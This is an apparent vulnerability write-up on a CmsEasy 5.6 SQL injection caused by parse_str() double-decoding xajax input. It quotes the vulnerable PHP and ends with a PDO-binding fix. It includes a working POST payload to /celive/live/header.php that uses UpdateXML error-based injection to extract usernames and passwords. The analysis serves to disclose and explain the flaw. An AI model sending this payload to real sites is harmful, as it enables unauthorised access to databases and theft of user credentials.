CmsEasy CmsEasy_5.6_20151009 unrestricted error-based SQL injection (the parse_str() pitfall)

Source: http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137013.html

An injection caused by parse_str().

// parse_str() parses a query string and registers its contents as variables; when the second parameter $arr is given, the result is written into that array instead. parse_str() urldecodes its input before parsing, so a value that PHP has already decoded once when populating $_POST gets decoded a second time, and that is what lets the single quote escape.

The vulnerability is fairly old by now. One limitation is that the PHP version must be lower than 5.4, because from 5.4 on magic_quotes_gpc is off by default, and when gpc is off the code calls addslashes().

```php
function Postdata($a) {
    global $db;
    $chatid = $_SESSION['chatid'];
    $name = $_SESSION['name'];
    // htmlspecialchars() with its pre-8.1 default flags does not touch single quotes
    $a['detail'] = htmlspecialchars($a['detail']);
    if (!get_magic_quotes_gpc()) {
        // the value is only escaped when gpc is off; with gpc on it is trusted as-is
        $a['detail'] = addslashes($a['detail']);
    }
    // remainder of the function omitted in the original
}
```

```php
    // Excerpt from the xajax request parser: the text between <q> and </q>
    // inside <xjxquery> is concatenated and handed to parse_str().
    if ($rootTag == "xjxquery") {
        $sQuery = "";
        $this->iPos++;
        while (!stristr($this->aObjArray[$this->iPos], "</xjxquery>")) {
            if (stristr($this->aObjArray[$this->iPos], "<q>") || stristr($this->aObjArray[$this->iPos], "</q>")) {
                $this->iPos++;
                continue;
            }
            $sQuery .= $this->aObjArray[$this->iPos];
            $this->iPos++;
        }
        // second URL decode: %2527 was decoded to %27 by PHP, and becomes ' here
        parse_str($sQuery, $aArray);
        if ($this->bDecodeUTF8Input) {
            foreach ($aArray as $key => $value) {
                $aArray[$key] = $this->_decodeUTF8Data($value);
            }
        }
        if (get_magic_quotes_gpc() == 1) {
            // with gpc on, any backslashes magic quotes added are removed again
            $newArray = array();
            foreach ($aArray as $sKey => $sValue) {
                if (is_string($sValue))
                    $newArray[$sKey] = stripslashes($sValue);
                else
                    $newArray[$sKey] = $sValue;
            }
            $aArray = $newArray;
        }
    }
    return $aArray;
}
```

The vulnerability is in parse_str($sQuery, $aArray);

which is why error-based injection is possible.

URL: /celive/live/header.php

POST:

    xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>
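An added example (my own, not code from CmsEasy or the xajax library) that walks a value through the two decodes and the escaping decisions shown above, then stores it with a bound parameter instead. It assumes PHP with the PDO SQLite driver; simulateXajaxParse, escapeLikePostdata and the sample value are constructed for this illustration.

```php
<?php
// Added example (not CmsEasy or xajax code): models the decoding pipeline
// described above and contrasts Postdata()'s escaping with a bound parameter.
// Function names and the sample value are constructed for this illustration.

// What $_POST['xajaxargs'][0] holds after PHP's own single URL decode.
// The quote is still encoded (%27), so an addslashes() pass at this
// stage has nothing to escape.
$decodedOnce = "detail=O%27Brien";

// The xajax <q> parser with magic_quotes_gpc reported as on.
function simulateXajaxParse(string $s, bool $magicQuotes): array {
    if ($magicQuotes) {
        $s = addslashes($s);              // no literal quote yet: no-op
    }
    parse_str($s, $out);                  // second decode: %27 becomes '
    if ($magicQuotes) {
        foreach ($out as $k => $v) {      // strips any escaping that did occur
            $out[$k] = is_string($v) ? stripslashes($v) : $v;
        }
    }
    return $out;
}

// Postdata()'s escaping: skipped entirely when gpc is on. ENT_COMPAT matches
// the pre-8.1 default of htmlspecialchars(), which leaves ' untouched.
function escapeLikePostdata(string $detail, bool $magicQuotes): string {
    $detail = htmlspecialchars($detail, ENT_COMPAT);
    return $magicQuotes ? $detail : addslashes($detail);
}

$a      = simulateXajaxParse($decodedOnce, true);
$detail = escapeLikePostdata($a['detail'], true);  // gpc on: no addslashes() ran
echo "value reaching the query: $detail\n";

// Fix: bind the value instead of interpolating it. How many times the
// input was decoded no longer affects the SQL grammar.
$db = new PDO('sqlite::memory:');
$db->exec("CREATE TABLE chat (id INTEGER PRIMARY KEY, detail TEXT)");
$stmt = $db->prepare("INSERT INTO chat (detail) VALUES (?)");
$stmt->execute([$detail]);
echo "stored literally: " . $db->query("SELECT detail FROM chat")->fetchColumn() . "\n";
```

The same applies to the real Postdata(): escaping tied to get_magic_quotes_gpc() describes how the value arrived, not what it contains after parse_str(), so the decision has to be made after the last decode or, better, made irrelevant by parameter binding.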

Original post: https://www.cnblogs.com/lzkalislw/p/13511564.html